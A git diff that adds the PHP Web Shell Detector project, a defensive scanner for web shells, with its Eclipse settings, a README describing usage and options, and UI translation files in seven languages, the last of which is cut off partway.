diff --git a/doc/PHP-Shell-Detector-master/.project b/doc/PHP-Shell-Detector-master/.project
new file mode 100644
index 0000000000000000000000000000000000000000..af207be078a4d440db2d6ee760d98bda39e50f4a
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/.project
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>PHP-Shell-Detector-master</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.wst.validation.validationbuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.wst.jsdt.core.jsNature</nature>
+	</natures>
+</projectDescription>
diff --git a/doc/PHP-Shell-Detector-master/.settings/.jsdtscope b/doc/PHP-Shell-Detector-master/.settings/.jsdtscope
new file mode 100644
index 0000000000000000000000000000000000000000..cca691f6cc02795a223f6b2dad78f86480ed88ff
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/.settings/.jsdtscope
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="con" path="org.eclipse.wst.jsdt.launching.JRE_CONTAINER"/>
+	<classpathentry kind="con" path="org.eclipse.wst.jsdt.launching.baseBrowserLibrary"/>
+	<classpathentry kind="src" path=""/>
+	<classpathentry kind="output" path=""/>
+</classpath>
diff --git a/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container
new file mode 100644
index 0000000000000000000000000000000000000000..49c8cd4f14a391fdb178f9dfbf869238642b1501
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container
@@ -0,0 +1 @@
+org.eclipse.wst.jsdt.launching.JRE_CONTAINER
\ No newline at end of file
diff --git a/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name
new file mode 100644
index 0000000000000000000000000000000000000000..11006e2a545afb3c2e4150dd8553048b785370ce
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name
@@ -0,0 +1 @@
+Global
\ No newline at end of file
diff --git a/doc/PHP-Shell-Detector-master/README.md b/doc/PHP-Shell-Detector-master/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..2da17a387e798b71b845f89fee7f527699a83a55
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/README.md
@@ -0,0 +1,95 @@
+Web Shell Detector
+==================
+<img src="http://www.emposha.com/wp-content/uploads/2011/07/shelldetect3-300x201.png" width="100" align="left" style="padding-right: 4px;" /> Web Shell Detector – is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells. Web Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%. By using the latest javascript and css technologies, web shell detector has a light weight and friendly interface.
+
+Web Shell Detector is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
+
+Console version (python): https://github.com/emposha/Shell-Detector
+
+
+Contributors
+------------
+Piotr Łuczko
+
+John Thornton
+
+Detection
+---------
+
+  Number of known shells: 604
+
+Requirements
+------------
+PHP 5.x, OpenSSL (only for secure file submission)
+
+Usage
+-----
+To activate Web Shell Detector:
+
+1) Upload shelldetect.php and shelldetect.db to your root directory
+
+2) Open shelldetect.php file in your browser
+
+    Example: http://www.website.com/shelldetect.php
+
+3) Use default username & password
+
+    Username: admin
+    Password: protect
+
+4) Inspect all strange files, if some of files look suspicious, send them to http://www.shelldetector.com team. After submitting your file, it will be inspected and if there are any threats, it will be inserted into a “web shell detector” web shells signature database.
+
+5) If any web shells found and identified use your ftp/ssh client to remove it from your web server (IMPORTANT: please be careful because some of shells may be integrated into system files!).
+
+Demo
+----
+
+    http://www.emposha.com/demo/shelldetect/
+
+Options
+-------
+ - extension - extensions that should be scanned
+ - showlinenumbers - show line number where suspicious function used
+ - dateformat - used with access time & modified time
+ - langauge - if I want to use other language
+ - directory - scan specific directory
+ - task - perform different task
+ - report_format - used with is_cron(true) file format for report file
+ - is_cron - if true run like a cron(no output)
+ - filelimit - maximum files to scan (more then 30000 you should scan specific directory)
+ - useget - activate _GET variable for easy way to recive tasks
+ - authentication  - protect script with user & password in case to disable simply set to NULL
+ - remotefingerprint - get shells signatures db by remote
+  
+
+Changelog
+---------
+
+ - 1.66 thanks to John Thornton for small tweeks and php 5.3.3 support
+ 
+ - 1.64 settings ini file support added(in case that you want to use same settings without code changing), output method rewriten, is_cron fixed, italian translation added (thanks to Marco Saiu)
+ 
+ - 1.63 new shell recognize mechanizm added, shell signatures updated.
+ 
+ - 1.62 version of jquery reverted to 1.7.x due bug with jquery ui dialog, new type of files added, shells signatures updated
+ 
+ - 1.61 added new way to send suspicious files, some css & code fixes, new shells signatures added
+ 
+ - 1.6 added support to indicate not shell files (but still those files need  to be removed), loader indicator added
+ 
+ - 1.52 noindex meta tag added (to remove script from search results), scann all files options added: extension = *
+
+ - 1.51 unpack function update
+ 
+ - 1.5 unpack function added, application version check added, many warnings fixed, error handler fixed.
+ 
+ - 1.4 hide suspicious files option added, file scanning changed.
+
+ - 1.3 submission of suspicious file to shelldetector.com changed, email field added with ability to get notify about suspicious file.
+ 
+ - 1.2 encryption function added, authentication added, some small bugs fixed
+
+ - 1.1 fingerprint function change
+       show line regex changed
+
+ - 1.0 first version
diff --git a/doc/PHP-Shell-Detector-master/lang/chinese.php b/doc/PHP-Shell-Detector-master/lang/chinese.php
new file mode 100644
index 0000000000000000000000000000000000000000..6488697eff248b74044929e0b5f4bc882aec1dc9
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/chinese.php
@@ -0,0 +1,50 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = '请登录后继续。';
+  $local['Shells signature database updated succesfully!'] = 'Shell 签名数据库更新成功!';
+  $local['Cant save shells signature database please check permissions'] = '不能保存 shell 签名数据库,请检查权限。';
+  $local['Your shells signatures database already updated!'] = '您的 shell 签名数据库已经更新!';
+  $local['New version of application found. Please update!'] = '发现新版本的程序。请更新!';
+  $local['Cant connect to server! Application version check failed!'] = '无法连接到服务器!程序版本检查失败!';
+  $local['New version of shells signature database found. Please update!'] = '发现新版本的 shell 签名数据库。请更新!';
+  $local['Cant connect to server! Version check failed!'] = '无法连接到服务器!版本检查失败!';
+  $local['You code submited. Thank you.'] = '您的代码已提交。非常感谢。';
+  $local['Cant find selected file.'] = '未找到选择的文件。';
+  $local['No file specified.'] = '未指定文件。';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = '开始扫描文件,请耐心等待,这需要花一些时间。';
+  $local['Number of known shells in database is: '] = '数据库中已知的 shell 数量:';
+  $local['Files found:'] = '已发现的文件:';
+  $local['File limit reached, scanning process stopped.'] = '已达到文件上限,扫描进程已停止。';
+  $local['File scan done, we have: @count files to analize'] = '文件扫描已完成:已分析 @count 个文件';
+  $local['Please note suspicious files information will not be displayed'] = '请注意:可疑文件信息不能显示。';
+  $local['Show sha for file:'] = '显示文件的 sha 值:';
+  $local['Full path:'] = '完整路径:';
+  $local['Sha1:'] = 'Sha1:';
+  $local['please note it`s a malicious file not a shell'] = '请注意:它是一个恶意文件,不是 shell。';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = '请注意潜在的危险文件(合法的文件,但可能被黑客利用)';
+  $local['Fingerprint:'] = '指纹:';
+  $local['Positive, it`s a '] = '实际上,它是一个 ';
+  $local['suspicious functions used:'] = '使用的可疑函数:';
+  $local['line:'] = '行号:';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>状态</strong>:已发现 @count 个可疑文件以及 @shells 个 shell';
+  $local['Negative'] = '不确定的';
+  $local['if wrong'] = '如果有误';
+  $local['submit file for analize'] = '提交文件以分析';
+  $local['Submit file'] = '提交文件';
+  $local['Your email'] = '您的 Email';
+  $local['(in case you want to be notified):'] = '(如果你想获得通知):';
+  $local['Suspicious behavior found in:'] = '发现可疑行为于:';
+  $local['Please note: file have different owner'] = '请注意:文件属于不同的所有者';
+  $local['Please note: file have full access permissions'] = '请注意:文件具有完全访问权限';
+  $local['Owner:'] = '所有者:';
+  $local['Permission:'] = '权限:';
+  $local['Last accessed:'] = '最后访问时间:';
+  $local['Last modified:'] = '最后修改时间:';
+  $local['MD5 hash:'] = 'MD5 哈希值:';
+  $local['Filesize:'] = '文件大小:';
+  $local['Please wait'] = '请稍候...';
+  $local['Done, report file created'] = '完成,报告文件已创建';
+  $local['Error, report file creation failed'] = '错误,报告文件创建失败';
+  $local['<strong>Error: </strong>'] = '<strong>错误:</strong>';
+  $local[' line: '] = '行号:';
+?>
diff --git a/doc/PHP-Shell-Detector-master/lang/french.php b/doc/PHP-Shell-Detector-master/lang/french.php
new file mode 100644
index 0000000000000000000000000000000000000000..f4c4260c9b66ba3531f2618217590641a7c50dcd
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/french.php
@@ -0,0 +1,46 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Merci de vous authentifier pour continuer.';
+  $local['Shells signature database updated succesfully!'] = 'Base de signatures mise à jour avec succès !';
+  $local['Cant save shells signature database please check permissions'] = 'Impossible d\'enregistrer la nouvelle version de la base de signatures. Vérifiez les permissions.';
+  $local['Your shells signatures database already updated!'] = 'Votre base de signatures est déjà à jour !';
+  $local['New version of application found. Please update!'] = 'Une nouvelle version de l\'application a été trouvée. Merci de mettre à jour !';
+  $local['Cant connect to server! Application version check failed!'] = 'Impossible de se connecter au serveur, la vérification de version de l\'application a échouée.';
+  $local['New version of shells signature database found. Please update!'] = 'Une nouvelle version de la base de signatures a été trouvée. Merci de mettre à jour !';
+  $local['Cant connect to server! Version check failed!'] = 'Impossible de se connecter au serveur, la vérification de la version a échouée.';
+  $local['You code submited. Thank you.'] = 'Votre code a été soumis. Merci.';
+  $local['Cant find selected file.'] = 'Impossible de trouver le fichier sélectionné.';
+  $local['No file specified.'] = 'Aucun fichier spécifié.';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Démarrage du scanner de fichiers, cela peut prendre du temps..';
+  $local['Number of known shells in database is: '] = 'Nombre de signatures connues dans la base :';
+  $local['Files found:'] = 'Fichiers trouvés :';
+  $local['File limit reached, scanning process stopped.'] = 'Limite de fichiers atteinte, scan interrompu.';
+  $local['File scan done, we have: @count files to analize'] = 'Le scan est terminé. Il y a @count fichiers à analyser.';
+  $local['Please note suspicious files information will not be displayed'] = 'Notez que les informations des fichiers suspicieux ne seront pas affichées.';
+  $local['Show sha for file:'] = 'SHA1 du fichier :';
+  $local['Full path:'] = 'Chemin complet :';
+  $local['Sha1:'] = 'SHA1 :';
+  $local['please note it`s a malicious file not a shell'] = 'Notez qu\'il s\'agit d\'un fichier malicieux, mais pas un shell.';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Notez qu\'il s\'agit d\'un fichier potentiellement dangereux (légitime mais pouvant être utilisé par des pirates)';
+  $local['Fingerprint:'] = 'Fingerprint :';
+  $local['Positive, it`s a '] = 'Positif, c\'est un ';
+  $local['suspicious functions used:'] = 'Fonctions suspicieuses :';
+  $local['line:'] = 'ligne :';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Statut</strong>: @count fichiers suspicieux trouvés et @shells shells trouvés';
+  $local['Negative'] = 'Négatif';
+  $local['if wrong'] = 'si faux';
+  $local['submit file for analize'] = 'Soumettre un fichier à une analyse';
+  $local['Submit file'] = 'Soumettre le fichier';
+  $local['Your email'] = 'Votre email';
+  $local['(in case you want to be notified):'] = '(dans le cas où vous voudriez être notifié):';
+  $local['Suspicious behavior found in:'] = 'Élément suspect trouvé dans :';
+  $local['Owner:'] = 'Propriétaire :';
+  $local['Permission:'] = 'Permissions :';
+  $local['Last accessed:'] = 'Dernier accès :';
+  $local['Last modified:'] = 'Dernière modification :';
+  $local['MD5 hash:'] = 'Hash MD5 :';
+  $local['Filesize:'] = 'Taille :';
+  $local['Please wait'] = 'Patientez...';
+  $local['<strong>Error: </strong>'] = '<strong>Erreur :</strong>';
+  $local[' line: '] = ' ligne :';
+?>
diff --git a/doc/PHP-Shell-Detector-master/lang/german.php b/doc/PHP-Shell-Detector-master/lang/german.php
new file mode 100644
index 0000000000000000000000000000000000000000..f95eaf730b891138421bfe7161982f9f619d1ad5
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/german.php
@@ -0,0 +1,46 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Bitte einloggen, um fortzufahren.';
+  $local['Shells signature database updated succesfully!'] = 'Shell-Signaturen in Datenbank erfolgreich aktualisiert!';
+  $local['Cant save shells signature database please check permissions'] = 'Kann Shell-Signaturen nicht in Datenbank speichern. Bitte prüfen Sie die Schreib-Berechtigung';
+  $local['Your shells signatures database already updated!'] = 'Ihre Shell-Signatur-Datenbank wurde bereits aktualisiert!';
+  $local['New version of application found. Please update!'] = 'Neue Programm-Version gefunden. Bitte aktualisieren!';
+  $local['Cant connect to server! Application version check failed!'] = 'Verbindung zum Server nicht möglich! Prüfung der Programm-Version fehlgeschlagen!';
+  $local['New version of shells signature database found. Please update!'] = 'Neue Shell-Signatur-Datenbank gefunden. Bitte aktualisieren!';
+  $local['Cant connect to server! Version check failed!'] = 'Verbindung zum Server nicht möglich! Prüfung der Datenbank-Version fehlgeschlagen!';
+  $local['You code submited. Thank you.'] = 'Ihr Programm-Code wurde übertragen. Vielen Dank.';
+  $local['Cant find selected file.'] = 'Ausgewählte Datei kann nicht gefunden werden.';
+  $local['No file specified.'] = 'Keine Datei ausgewählt.';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Starte Datei-Scanner. Bitte haben Sie Gedult, dies kann einen Moment dauern.';
+  $local['Number of known shells in database is: '] = 'Anzahl bekannter Shell-Befehle in der Datenbank:';
+  $local['Files found:'] = 'Gefundene Dateien:';
+  $local['File limit reached, scanning process stopped.'] = 'Datei-Limit ereicht, Scan-Prozess angehalten.';
+  $local['File scan done, we have: @count files to analize'] = 'Datei-Scan durchgeführt, es gibt: @count zu analysierende Dateien';
+  $local['Please note suspicious files information will not be displayed'] = 'Bitte beachten Sie, dass Inhalte verdächtiger Dateien nicht angezeigt werden';
+  $local['Show sha for file:'] = 'Zeige Sha für die Datei:';
+  $local['Full path:'] = 'Relativer Pfad:';
+  $local['Sha1:'] = 'Sha1:';
+  $local['please note it`s a malicious file not a shell'] = 'Bitte beachten: es handelt sich um eine schädliche Datei, nicht um einen Shell-Befehl.';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Bitte beachten: potentiell schädliche Datei (ggf. ein Original, aber möglicherweise durch Hacker eingespeist)';
+  $local['Fingerprint:'] = 'Fingerabdruck:';
+  $local['Positive, it`s a '] = 'Positiv, es ist ein ';
+  $local['suspicious functions used:'] = 'Verdächtige Funktionen:';
+  $local['line:'] = 'Zeile:';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Status</strong>: @count verdächtige Dateien gefunden und @shells ungewöhnliche Shell-Befehle gefunden';
+  $local['Negative'] = 'Negativ';
+  $local['if wrong'] = 'falls falsch,';
+  $local['submit file for analize'] = 'übermittle Datei für Analyse';
+  $local['Submit file'] = 'Datei übertragen';
+  $local['Your email'] = 'Ihre Email-Adresse';
+  $local['(in case you want to be notified):'] = '(für den Fall, dass Sie informiert werden möchten):';
+  $local['Suspicious behavior found in:'] = 'Ungewöhnliches Verhalten gefunden in:';
+  $local['Owner:'] = 'Eigentümer:';
+  $local['Permission:'] = 'Berechtigung:';
+  $local['Last accessed:'] = 'Letzter Aufruf:';
+  $local['Last modified:'] = 'Letzte Bearbeitung:';
+  $local['MD5 hash:'] = 'MD5-Hash:';
+  $local['Filesize:'] = 'Dateigröße:';
+  $local['Please wait'] = 'Bitte warten';
+  $local['<strong>Error: </strong>'] = '<strong>Fehler: </strong>';
+  $local[' line: '] = ' Zeile: ';
+?>
diff --git a/doc/PHP-Shell-Detector-master/lang/italian.php b/doc/PHP-Shell-Detector-master/lang/italian.php
new file mode 100644
index 0000000000000000000000000000000000000000..a5574401d73f59fd1851cf8882aba086975cfd5c
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/italian.php
@@ -0,0 +1,52 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Perfavore esegui l\'accesso per continuare';
+  $local['Shells signature database updated succesfully!'] = 'Il database delle shell &grave; stato aggiornato con successo!';
+  $local['Cant save shells signature database please check permissions'] = 'Non &egrave; possibile salvare il database controlla i permessi';
+  $local['Your shells signatures database already updated!'] = 'Il database delle shell &egrave; gi&agrave; aggiornato!';
+  $local['New version of application found. Please update!'] = '&Egrave; stata trovata una nuova versione dell\'applicazione. Perfavore procedi con l\'aggiornamento!';
+  $local['Cant connect to server! Application version check failed!'] = 'Non &egrave; possibile connettersi al server! Il controllo della versione &egrave; fallito!';
+  $local['New version of shells signature database found. Please update!'] = '&Egrave; stata trovata una nuova versione del database. Perfavore procedi con l
+
+\'aggiornamento!';
+  $local['Cant connect to server! Version check failed!'] = 'Non &egrave; possibile connettersi al server! Il controllo della versione &egrave; fallitto!';
+  $local['You code submited. Thank you.'] = 'Il codice &egrave; stato inviato. Grazie.';
+  $local['Cant find selected file.'] = 'Non &egrave; stato trovato il file selezionato';
+  $local['No file specified.'] = 'Nessun file speficiato';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Avvio dell\'analisi dei file, si prega di attendere la scansione pu&ograve; 
+
+richiedere diverso tempo.';
+  $local['Number of known shells in database is: '] = 'Numero di shell conosciute nel database: ';
+  $local['Files found:'] = 'File trovati:';
+  $local['File limit reached, scanning process stopped.'] = 'Il limite dei file &egrave; stato raggiunto, la scansione &egrave stata interrota.';
+  $local['File scan done, we have: @count files to analize'] = 'La scansione dei file &egrave; stata effettuata, abbiamo: @count file da analizzare';
+  $local['Please note suspicious files information will not be displayed'] = 'Si prega di notare le informazioni dei file sospetti non verranno visualizzati';
+  $local['Show sha for file:'] = 'Mostra sha per file:';
+  $local['Full path:'] = 'Percorso Completo:';
+  $local['Sha1:'] = 'Sha1:';
+  $local['please note it`s a malicious file not a shell'] = 'si prega di notare questo &egrave; un file sospetto non una shell';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'vi prego di notare questo file &egrave; potenzialmente pericoloso (file 
+
+legittimo, ma pu&ograve; essere utilizzato dagli hacker)';
+  $local['Fingerprint:'] = 'Impronta:';
+  $local['Positive, it`s a '] = 'Positivo, &egrave; una ';
+  $local['suspicious functions used:'] = 'Funzione sospetta:';
+  $local['line:'] = 'linea:';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Stato</strong>: Trovati @count file sospetti e @shells shell';
+  $local['Negative'] = 'Negativo';
+  $local['if wrong'] = 'se sbagliato';
+  $local['submit file for analize'] = 'Invia file per l\'analisi';
+  $local['Submit file'] = 'Invia file';
+  $local['Your email'] = 'Tua email';
+  $local['(in case you want to be notified):'] = '(Se vuoi essere informato):';
+  $local['Suspicious behavior found in:'] = 'Elemento sospetto trovato in:';
+  $local['Owner:'] = 'Proprietario:';
+  $local['Permission:'] = 'Permessi:';
+  $local['Last accessed:'] = 'Ultimo accesso:';
+  $local['Last modified:'] = 'Ultima modifica:';
+  $local['MD5 hash:'] = 'MD5 hash:';
+  $local['Filesize:'] = 'Dimensione:';
+  $local['Please wait'] = 'Attendere';
+  $local['<strong>Error: </strong>'] = '<strong>Errore:</strong>';
+  $local[' line: '] = 'linea:';
+?>
\ No newline at end of file
diff --git a/doc/PHP-Shell-Detector-master/lang/pt_BR.php b/doc/PHP-Shell-Detector-master/lang/pt_BR.php
new file mode 100644
index 0000000000000000000000000000000000000000..83f715849ee6342f3b418d82f8622c823aeff492
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/pt_BR.php
@@ -0,0 +1,46 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Por favor, faça o login para continuar.';
+  $local['Shells signature database updated succesfully!'] = 'A sua base de assinaturas foi atualizada com sucesso !';
+  $local['Cant save shells signature database please check permissions'] = 'Não foi possível salvar a nova versão da sua base de assinaturas. Verifique as permissões.';
+  $local['Your shells signatures database already updated!'] = 'A sua base de assinaturas já está na última versão!';
+  $local['New version of application found. Please update!'] = 'Nova versão da aplicação foi encontrada. Favor atualizar !';
+  $local['Cant connect to server! Application version check failed!'] = 'Impossível se conectar ao servidor ! A checagem de versão do aplicativo falhou !';
+  $local['New version of shells signature database found. Please update!'] = 'Nova versão da base de assinaturas foi encontrada. Por favor atualize !';
+  $local['Cant connect to server! Version check failed!'] = 'Impossível se conectar ao servidor ! A verificação de versão falhou!';
+  $local['You code submited. Thank you.'] = 'Seu código foi enviado. Obrigado. ';
+  $local['Cant find selected file.'] = 'Impossível achar o arquivo selecionado.';
+  $local['No file specified.'] = 'Não foi especificado um arquivo. ';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Iniciando o escaneamento dos arquivos, tenha um pouco de paciência pois o processo levará algum tempo ... ';
+  $local['Number of known shells in database is: '] = 'Número de assinaturas desta base de assinaturas :';
+  $local['Files found:'] = 'Arquivos encontrados :';
+  $local['File limit reached, scanning process stopped.'] = 'Limite de arquivos atingido. O processo de escaneamento foi interrompido.';
+  $local['File scan done, we have: @count files to analize'] = 'O escaneamento dos arquivos terminou e temos @count arquivos a analisar.';
+  $local['Please note suspicious files information will not be displayed'] = 'Atenção pois as informações dos arquivos suspeitos não serão mostradas.';
+  $local['Show sha for file:'] = 'SHA1 do ficheiro :';
+  $local['Full path:'] = 'Caminho completo para o arquivo :';
+  $local['Sha1:'] = 'SHA1 :';
+  $local['please note it`s a malicious file not a shell'] = 'Atenção este é um arquivo malicioso, mas não é um shell .';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Atenção este arquivo é potencialmente perigoso ( pode ser um arquivo legítimo mas ele pode ser usado por hackers )';
+  $local['Fingerprint:'] = 'Fingerprint :';
+  $local['Positive, it`s a '] = 'Positivo, isto é ';
+  $local['suspicious functions used:'] = 'Funções suspeitas :';
+  $local['line:'] = 'linha :';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Status</strong>: @count arquivos suspeitos encontrados e @shells encontrados ';
+  $local['Negative'] = 'Negativo';
+  $local['if wrong'] = 'se há erros';
+  $local['submit file for analize'] = 'Envie o arquivo para análise';
+  $local['Submit file'] = 'Envie o arquivo';
+  $local['Your email'] = 'Seu e-mail';
+  $local['(in case you want to be notified):'] = '(caso você queira ser notificado):';
+  $local['Suspicious behavior found in:'] = 'Elemento suspeito encontrado em :';
+  $local['Owner:'] = 'Proprietário :';
+  $local['Permission:'] = 'Permissões :';
+  $local['Last accessed:'] = 'Último acesso :';
+  $local['Last modified:'] = 'Última modificação :';
+  $local['MD5 hash:'] = 'Hash MD5 :';
+  $local['Filesize:'] = 'Tamanho do arquivo:';
+  $local['Please wait'] = 'Por favor aguarde...';
+  $local['<strong>Error: </strong>'] = '<strong>Erro :</strong>';
+  $local[' line: '] = ' linha :';
+?>
diff --git a/doc/PHP-Shell-Detector-master/lang/russian.php b/doc/PHP-Shell-Detector-master/lang/russian.php
new file mode 100644
index 0000000000000000000000000000000000000000..526d0acb0f4f3043cd02144a5120a42c452e0e32
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/russian.php
@@ -0,0 +1,50 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Пожалуйста, авторизуйтесь прежде чем начать.';
+  $local['Shells signature database updated succesfully!'] = 'Базы сигнатур успешно обновлены!';
+  $local['Cant save shells signature database please check permissions'] = 'Не удается сохранить баху сигнатур. Пожалуйста, проверьте права на запись.';
+  $local['Your shells signatures database already updated!'] = 'Ваши базы сигнатур уже были обновлены!';
+  $local['New version of application found. Please update!'] = 'Найдена новая версия программы. Пожалуйста, обновитесь!';
+  $local['Cant connect to server! Application version check failed!'] = 'Проверка обновлений приложения не удалась. Нет соединения с сервером.';
+  $local['New version of shells signature database found. Please update!'] = 'Ваша база сигнатур устарела. Пожалуйста, обновитесь!';
+  $local['Cant connect to server! Version check failed!'] = 'Проверка обновлений сигнатур не удалась. Нет соединения с сервером.';
+  $local['You code submited. Thank you.'] = 'Ваш код отправлен, спасибо.';
+  $local['Cant find selected file.'] = 'Выбранный файл не найден.';
+  $local['No file specified.'] = 'Не выбран файл.';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Началось сканирование файлов. Пожалуйста, подождите. Это может занять несколько минут.';
+  $local['Number of known shells in database is: '] = 'Число известных сигнатур шеллов:';
+  $local['Files found:'] = 'Найдено файлов';
+  $local['File limit reached, scanning process stopped.'] = 'Достигнут лимит кол-ва файлов файлов. Сканирование остановлено.';
+  $local['File scan done, we have: @count files to analize'] = 'Сканирование файлов завершено. Найдно @count файлов для анализа';
+  $local['Please note suspicious files information will not be displayed'] = 'Информация о подозрительных файлах не будет отображена';
+  $local['Show sha for file:'] = 'Показать SHA файла:';
+  $local['Full path:'] = 'Полный путь:';
+  $local['Sha1:'] = 'Sha1:';
+  $local['please note it`s a malicious file not a shell'] = 'Обратите внимание на этот файл. Он может быть инфицирован.';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Обратите внимание на этот файл, он может быть использован хакерами.';
+  $local['Fingerprint:'] = 'Сигнатура:';
+  $local['Positive, it`s a '] = 'Найдено совпадение, это ';
+  $local['suspicious functions used:'] = 'используются подозрительные функции:';
+  $local['line:'] = 'строка:';
+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">Rescan and show suspicious files</a>'] = '<strong>Статус</strong>: найдено @count подозрительных файлов. Найдено @shells шеллов. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">Запустить сканирование заново и показать подозрительные файлы.</a>';
+  $local['Negative'] = 'Совпадений не найдено.';
+  $local['if wrong'] = 'если файл определен ошибочно';
+  $local['submit file for analize'] = 'отправьте файл на анализ';
+  $local['Submit file'] = 'Отправить файл';
+  $local['Your email'] = 'Ваш email';
+  $local['(in case you want to be notified):'] = '(в случае, если Вы хотите получить уведомление):';
+  $local['Suspicious behavior found in:'] = 'Подозрительный код в:';
+  $local['Please note: file have different owner'] = 'Обратите внимание: у файла другой владелец';
+  $local['Please note: file have full access permissions'] = 'Обратите внимание: файл имеет полние права доступа';
+  $local['Owner:'] = 'Владелец:';
+  $local['Permission:'] = 'Права:';
+  $local['Last accessed:'] = 'Дата доступа:';
+  $local['Last modified:'] = 'Дата модификации:';
+  $local['MD5 hash:'] = 'MD5 хеш:';
+  $local['Filesize:'] = 'Размер файла:';
+  $local['Please wait'] = 'Пожалуйста, подождите...';
+  $local['Done, report file created'] = 'Завершено. Файл отчета создан';
+  $local['Error, report file creation failed'] = 'Ошибка создания файла отчета';
+  $local['<strong>Error: </strong>'] = '<strong>Ошибка:</strong>';
+  $local[' line: '] = ' строка: ';
+?>
diff --git a/doc/PHP-Shell-Detector-master/lang/spanish.php b/doc/PHP-Shell-Detector-master/lang/spanish.php
new file mode 100644
index 0000000000000000000000000000000000000000..d8daa8ec33365aa481d6499f5b0e0a251c0ffd87
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/lang/spanish.php
@@ -0,0 +1,50 @@
+<?php
+  $local = array();
+  $local['Please login to continue.'] = 'Por favor inicie sesion para continuar。';
+  $local['Shells signature database updated succesfully!'] = 'La base de datos ha sido actualizada!';
+  $local['Cant save shells signature database please check permissions'] = 'No se puede guardar actualizar la base de datos, por favor revise los permisos de escritura。';
+  $local['Your shells signatures database already updated!'] = 'La base de datos ya ha sido actualizada previamente!';
+  $local['New version of application found. Please update!'] = 'Hay una nueva version de la aplicacion, Por favor actualize!';
+  $local['Cant connect to server! Application version check failed!'] = 'No se puede conectar al servidor, La comprovacion de la version de la aplicacion a fallado!';
+  $local['New version of shells signature database found. Please update!'] = 'Una nueva version de la base de datos a sido encontrada, por favor aactualize!';
+  $local['Cant connect to server! Version check failed!'] = 'No se puede conectar al servidor, La comprovacion de la version de la aplicacion a fallado!';
+  $local['You code submited. Thank you.'] = 'Su codigo a sido enviado, Gracias';
+  $local['Cant find selected file.'] = 'No se puede encontrar el archivo seleccionado.';
+  $local['No file specified.'] = 'No a seleccionado el archivo.';
+  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Iniciando scan, por favor sea paciente, esto tomara un tiempo';
+  $local['Number of known shells in database is: '] = 'La cantidad de shells en la base de datos es de:';
+  $local['Files found:'] = 'Archivos encontrados:';
+  $local['File limit reached, scanning process stopped.'] = 'El limite de archivos fue alcanzado, El scan a terminado';
+  $local['File scan done, we have: @count files to analize'] = 'El scan a finalizado, Tenemos: @count de archivos para analizar';
+  $local['Please note suspicious files information will not be displayed'] = 'Tome en cuenta que archivos sospechosos no seran mostrados';
+  $local['Show sha for file:'] = 'Display sha por archivo:';
+  $local['Full path:'] = 'Ruta:';
+  $local['Sha1:'] = 'Sha1:';
+  $local['please note it`s a malicious file not a shell'] = 'Tome en cuenta que un archivo sospechoso, no una shell';
+  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Tome en cuenta que un archivo peligroso (Archivo legitimo, pero puede ser usado por hackers) ';
+  $local['Fingerprint:'] = 'Fingerprint:';
+  $local['Positive, it`s a '] = 'Positivo, es un ';
+  $local['suspicious functions used:'] = 'function sospechosa:';
+  $local['line:'] = 'Linea:';
